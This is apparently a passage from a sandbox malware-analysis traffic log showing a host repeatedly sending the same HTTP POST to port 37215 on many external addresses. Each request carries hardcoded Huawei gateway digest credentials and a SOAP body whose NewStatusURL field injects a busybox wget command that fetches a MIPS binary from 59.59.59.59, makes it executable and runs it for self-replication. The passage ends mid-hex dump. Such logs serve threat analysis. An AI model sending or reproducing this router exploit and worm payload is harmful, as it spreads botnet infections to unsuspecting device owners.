                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1695192.168.2.1534832157.153.97.20237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941512108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1696192.168.2.1543318157.4.71.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941598892 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1697192.168.2.1556454119.115.84.24037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941617966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1698192.168.2.1553508197.68.133.9437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941636086 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1699192.168.2.1558596184.123.216.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941657066 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1700192.168.2.155131641.47.87.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941745043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1701192.168.2.1535364157.85.250.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941765070 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1702192.168.2.153599464.135.143.16637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941792011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1703192.168.2.1544056157.130.0.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941812992 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1704192.168.2.1559194197.164.56.12637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941827059 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 